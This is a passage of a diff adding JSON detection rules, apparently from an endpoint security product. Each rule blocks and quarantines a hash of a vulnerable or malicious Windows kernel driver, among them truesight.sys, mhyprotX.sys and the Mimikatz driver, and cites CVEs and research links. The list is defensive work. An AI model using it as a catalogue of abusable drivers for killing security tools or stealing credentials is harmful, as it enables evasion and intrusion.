+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1414c3db-ab57-5b5c-8025-4208058bcc41",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973450Z",
+ "creation_date": "2026-03-23T11:45:29.973452Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973457Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cc687fe3741bbde1dd142eac0ef59fd1d4457daee43cdde23bb162ef28d04e64",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1415d079-b077-5e35-9e0a-e7134a8010d4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.619558Z",
+ "creation_date": "2026-03-23T11:45:29.619560Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.619565Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f1f345591efe74fd12e706132939f51963eb39dd0a1db556123c3e850c60fada",
+ "comment": "Insyde Software dangerous update tool (aka segwindrvx64.sys) [https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Program%3AWin32%2FVulnInsydeDriver.A&threatid=258247] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "142db16a-a14d-59b9-975b-987aaf865836",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.967622Z",
+ "creation_date": "2026-03-23T11:45:29.967624Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.967630Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5c206b569b7059b7c32eb5fc36922cb435c2b16c8d96de1038c8bd298ed498fe",
+ "comment": "Vulnerable Kernel Driver (aka Netfilter.sys) [https://www.loldrivers.io/drivers/9454a752-233e-4ba2-b585-8da242bf8f31/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "142e5b48-476f-55e9-8f79-dcdcbf407261",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.818295Z",
+ "creation_date": "2026-03-23T11:45:30.818297Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818302Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9917144b7240b1ce0cadb1210fd26182744fbbdf145943037c4b93e44aced207",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "143c1959-80d3-5468-a6e6-c1d3eed062f9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.147893Z",
+ "creation_date": "2026-03-23T11:45:31.147897Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.147906Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fc4dfcb9ddcc41909bf99e4c197da3778afcdf6431862177c289b6200da0ebe8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "144d9b36-3c42-5036-92e6-17a12035fd58",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.466608Z",
+ "creation_date": "2026-03-23T11:45:30.466611Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.466620Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "aafa642ca3d906138150059eeddb6f6b4fe9ad90c6174386cfe13a13e8be47d9",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "14620831-106c-5eb4-87bb-da564c6a8790",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.816967Z",
+ "creation_date": "2026-03-23T11:45:31.816969Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.816975Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a54e9e7fb0dd039ffd724cc5203ddcc1dd898c5224ae74e2327d3fa97a309643",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "14665a92-845b-5321-9eab-331660560bad",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150356Z",
+ "creation_date": "2026-03-23T11:45:31.150358Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150364Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6f571267b63865e23f63bd549e3309f07fb8a5b4421ad6ca1d04eae3d3e90394",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "146b9a56-8b03-55d4-af11-7bbbb9dfe5b4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982940Z",
+ "creation_date": "2026-03-23T11:45:29.982948Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982953Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5e27fe26110d2b9f6c2bad407d3d0611356576b531564f75ff96f9f72d5fcae4",
+ "comment": "Vulnerable Kernel Driver (aka WiseUnlo.sys) [https://www.loldrivers.io/drivers/b28cc2ee-d4a2-4fe4-9acb-a7a61cad20c6/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "146d50a3-c782-53bf-9ba9-905f5712b1d5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.817551Z",
+ "creation_date": "2026-03-23T11:45:31.817553Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.817559Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9341856f3855acf21a36fa25c9539dade2182a029ebac116811eb49abff9cbe7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "146f645d-46b6-5c6f-97db-0da4bc7025c6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817311Z",
+ "creation_date": "2026-03-23T11:45:30.817314Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.817319Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "84683c840af3440b8b40d34088ec852e092f882ca558409d8338f1f5f46d2741",
+ "comment": "Vulnerable Kernel Driver (aka AODDriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "14786b4d-b75b-5b06-8270-c6f57694cc25",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.455247Z",
+ "creation_date": "2026-03-23T11:45:30.455251Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.455260Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "651ffa0c7aff7b4a7695dddd209dc3e7f68156e29a14d3fcc17aef4f2a205dcc",
+ "comment": "Vulnerable Kernel Driver (aka Netfilter.sys) [https://www.loldrivers.io/drivers/9454a752-233e-4ba2-b585-8da242bf8f31/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1478990a-6173-5836-b2d1-033d954adc0e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979116Z",
+ "creation_date": "2026-03-23T11:45:29.979118Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979124Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dcd5404c83f74f0b7a8d0735174af78782aaa99d2b5b5b24f44c48b295a2ba31",
+ "comment": "Vulnerable Kernel Driver (aka LHA.sys) [https://www.loldrivers.io/drivers/eb07ef7e-0402-48eb-8e06-8fb76eda5b84/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "147ffe77-4c9a-5ceb-8b85-43b7d1a35d0d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.140708Z",
+ "creation_date": "2026-03-23T11:45:31.140710Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.140715Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f26e088583f9a5f518c64c2406c70c90ff50142574389459a0da579448a8f0ea",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "14806960-67e3-573d-8cdc-bffe1470d7bf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610581Z",
+ "creation_date": "2026-03-23T11:45:29.610583Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610591Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8cf0cbbdc43f9b977f0fb79e0a0dd0e1adabe08a67d0f40d727c717c747de775",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "14825860-c440-5708-a424-6a93f8981c23",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611949Z",
+ "creation_date": "2026-03-23T11:45:29.611951Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611956Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b8b94c2646b62f6ac08f16514b6efaa9866aa3c581e4c0435a7aeafe569b2418",
+ "comment": "Genshin Impact vulnerable driver (aka mhyprotX.sys) [https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1495dbe3-877c-5c16-afe6-09c53c8ebc3f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.974801Z",
+ "creation_date": "2026-03-23T11:45:29.974803Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.974808Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "13002b14aa6e63dc7117e2969d038beb009dbd6093a4590c6913b426d773dea3",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1497784d-e0ed-5a05-bc0f-b3f605709cb8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.481104Z",
+ "creation_date": "2026-03-23T11:45:31.481108Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.481117Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0c6bcd1ac8da860f8f9213d19df235669226f455f6a1fc0f975463085e59ad7d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "149a44bc-d5dc-5b73-97ac-292075977f5f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.486934Z",
+ "creation_date": "2026-03-23T11:45:31.486937Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.486955Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fdf17b4b7f4f3fed37647e37bb85448bf06c3e07ea6663d758af1b8a84ea2ca3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "14aefbb1-5c8f-5b0c-8751-ae2d942f7925",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.476932Z",
+ "creation_date": "2026-03-23T11:45:30.476935Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.476951Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5e789b6d535b49c66c658978099e50fa2f8d02c2511bdaf9358bb8e40bdcef8e",
+ "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "14afbff7-3dce-5ef7-a3d9-9dcbca00da51",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142827Z",
+ "creation_date": "2026-03-23T11:45:31.142829Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142834Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "533527cc7c4a72ac5ca7be7b01df2989412bc820da29e3eac0fb24b3be5b8169",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "14b14343-29ad-5b4c-921e-372488ae9ead",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.970729Z",
+ "creation_date": "2026-03-23T11:45:29.970732Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.970740Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9df2cfbe1c9e6f616726a88310a33bb856126fb490f7f0d16229d97dbb50ae2f",
+ "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "14b734b3-a959-5ccd-a96d-73d5f8a5df6e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
